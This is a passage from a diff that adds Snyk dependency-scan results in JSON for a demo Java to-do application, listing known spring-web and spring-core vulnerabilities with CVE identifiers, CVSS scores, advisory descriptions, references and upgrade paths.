+ ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "credit": [ + "Toshiaki Maki" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.14.RELEASE)", + "[4.0.0.RELEASE, 4.1.7.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.14.RELEASE", + "4.1.7.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/17727", + "title": "GitHub Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192", + "title": "NVD" + }, + { + "url": "http://pivotal.io/security/cve-2015-3192", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:18.827537Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:06.799603Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It does not properly process inline DTD declarations when DTD is not entirely disabled, which allows remote attackers to cause a denial of service (memory consumption and out-of-memory errors) via a crafted XML file.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-web` to version 3.2.14.RELEASE, 4.1.7.RELEASE or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/5a711c05ec750f069235597173084c2ee796242)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/17727)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3192)\n- [Pivotal Security](http://pivotal.io/security/cve-2015-3192)\n", + "epssDetails": { + "percentile": "0.91000", + "probability": "0.03030", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-3192" + ], + "CWE": [ + "CWE-119" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:55Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-16T05:57:41Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:06.799603Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.14.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "title": "Reflected File Download", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[3.2.0.RELEASE, 3.2.15.RELEASE)", + "[4.0.0.RELEASE, 4.1.8.RELEASE)", + "[4.2.0.RELEASE, 4.2.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.15.RELEASE", + "4.1.8.RELEASE", + "4.2.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/18124", + "title": "GitHub Issue" + }, + { + "url": "https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/", + "title": "Oren Hafif Blog" + }, + { + "url": "http://pivotal.io/security/cve-2015-5211", + "title": "Pivotal Security" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2015-5211", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 9.6, + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:03.857756Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.763614Z" + } + ], + "description": "## Overview\n\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\n\nAffected versions of this package are vulnerable to Reflected File Download\nvia a crafted URL with a batch script extension, resulting in the response being downloaded rather than rendered.\n\n## Remediation\n\nUpgrade `org.springframework:spring-web` to version 3.2.15.RELEASE, 4.1.8.RELEASE, 4.2.2.RELEASE or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/03f547eb9868f48f44d59b56067d4ac4740672c3)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/2bd1daa75ee0b8ec33608ca6ab065ef3e1815543)\n\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/a95c3d820dbc4c3ae752f1b3ee22ee860b162402)\n\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/18124)\n\n- [Oren Hafif Blog](https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/)\n\n- [Pivotal Security](http://pivotal.io/security/cve-2015-5211)\n\n- [RedHat CVE Database](https://access.redhat.com/security/cve/cve-2015-5211)\n", + "epssDetails": { + "percentile": "0.68512", + "probability": "0.00278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5211" + ], + "CWE": [ + "CWE-494" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-10-15T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2016-12-25T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:48.763614Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.15.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "credit": [ + "Spase Markovski" + ], + "semver": { + "vulnerable": [ + "[3.0.0.RELEASE,3.2.8.RELEASE)", + "[4.0.0.RELEASE,4.0.2.RELEASE)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "3.2.8.RELEASE", + "4.0.2.RELEASE" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/edba32b3093703d5e9ed42b5b8ec23ecc1998398%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/fb0683c066e74e9667d6cd8c5fa01f674c68c3be%23diff-1f3f1d5cdab9ac92d1ca5ec7def8f131", + "title": "GitHub Commit" + }, + { + "url": "https://jira.spring.io/browse/SPR-11376", + "title": "Jira Issue" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054", + "title": "NVD" + }, + { + "url": "http://www.pivotal.io/security/cve-2014-0054", + "title": "Pivotal Security" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 6.3, + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:09.210753Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:48.737689Z" + } + ], + "description": "## Overview\r\n[`org.springframework:spring-web`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-web%22)\r\nAffected versions of this package do not disable external entity resolution, which allows remote attackers to read arbitrary files, cause a denial of service and conduct CSRF attacks via crafted XML, aka an XML External Entity (XXE) issue. \r\n\r\n**NOTE:** this vulnerability exists because of an incomplete fix for [CVE-2013-4152](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-31330), [CVE-2013-7315](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30162), and [CVE-2013-6429](https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-30160).\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0054)", + "epssDetails": { + "percentile": "0.96745", + "probability": "0.25530", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-0054" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2017-02-22T07:28:31.538000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-04-17T14:55:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2014-06-06T21:43:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:48.737689Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@3.2.8.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "credit": [ + "Sean Pesce" + ], + "semver": { + "vulnerable": [ + "[,5.3.32)", + "[6.0.0,6.0.17)", + "[6.1.0,6.1.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.32", + "6.0.17", + "6.1.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22243", + "title": "Spring Advisory" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.264548Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22243" + ], + "CWE": [ + "CWE-601", + "CWE-918" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-02-22T09:39:25.202849Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-02-21T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-02-22T15:48:30.525565Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.264548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "credit": [ + "threedr3am" + ], + "semver": { + "vulnerable": [ + "[,5.3.33)", + "[6.0.0, 6.0.18)", + "[6.1.0, 6.1.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.33", + "6.0.18", + "6.1.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2024-22259", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.1, + "cvssVersion": "3.1", + "modificationTime": "2024-07-02T15:25:03.250566Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-17T13:32:42.716493Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when using `UriComponentsBuilder` to parse an externally provided `URL` and perform validation checks on the host of the parsed URL. \r\n\r\n**Note:**\r\nThis is the same as [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.33, 6.0.18, 6.1.5 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/1d2b55e670bcdaa19086f6af9a5cec31dd0390f0)\n- [Spring Advisory](https://spring.io/security/cve-2024-22259)\n", + "epssDetails": { + "percentile": "0.26310", + "probability": "0.00061", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22259" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-03-15T10:11:04.950943Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-03-14T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-03-15T10:42:12.997061Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-07-02T15:25:03.250566Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "title": "Open Redirect", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "credit": [ + "L0ne1y" + ], + "semver": { + "vulnerable": [ + "[,5.3.34)", + "[6.0.0, 6.0.19)", + "[6.1.0, 6.1.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.34", + "6.0.19", + "6.1.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-web", + "references": [ + { + "url": "https://spring.io/security/cve-2024-22262", + "title": "Spring Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.4, + "cvssVersion": "3.1", + "modificationTime": "2024-04-12T08:32:41.960388Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-04-16T13:32:25.163950Z" + } + ], + "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` is used to parse an externally provided URL and perform validation checks on the host of the parsed URL. \n\n**Note:**\nThis is the same as [CVE-2024-22259](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790) and [CVE-2024-22243](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586), but with different input.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.34, 6.0.19, 6.1.6 or higher.\n## References\n- [Spring Advisory](https://spring.io/security/cve-2024-22262)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-22262" + ], + "CWE": [ + "CWE-601" + ] + }, + "packageName": "org.springframework:spring-web", + "proprietary": false, + "creationTime": "2024-04-12T08:32:41.735891Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-04-11T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-web" + }, + "publicationTime": "2024-04-12T08:32:41.913608Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-04-16T13:32:25.163950Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-web", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "title": "Improper Output Neutralization for Logs", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Dennis Kennedy" + ], + "semver": { + "vulnerable": [ + "[5.3.0,5.3.12)", + "[,5.2.18)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.12", + "5.2.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5", + "title": "Github Commit" + }, + { + "url": "https://pivotal.io/security/cve-2021-22096", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 4.3, + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:20.847607Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:36.610042Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:48.086414Z" + } + ], + "description": "## Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Improper Output Neutralization for Logs when a user provides malicious input, causing insertion of additional log entries.\n## Remediation\nUpgrade `org.springframework:spring-core` to version 5.3.12, 5.2.18 or higher.\n## References\n- [Github Commit](https://github.com/spring-projects/spring-framework/commit/346b75580267dc5d8d257be198d5841ce4e1add5)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2021-22096)\n", + "epssDetails": { + "percentile": "0.34533", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-22096" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.springframework:spring-core", + "proprietary": false, + "creationTime": "2022-01-02T11:14:46.053186Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-10-27T12:52:59Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-core" + }, + "publicationTime": "2021-10-27T16:55:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.086414Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.18.RELEASE", + "org.springframework:spring-core@5.2.18.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-core", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "psytester" + ], + "semver": { + "vulnerable": [ + "[,5.2.19.RELEASE)", + "[5.3.0,5.3.14)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.19.RELEASE", + "5.3.14" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-core", + "references": [ + { + "url": "https://pivotal.io/security/cve-2021-22060", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + 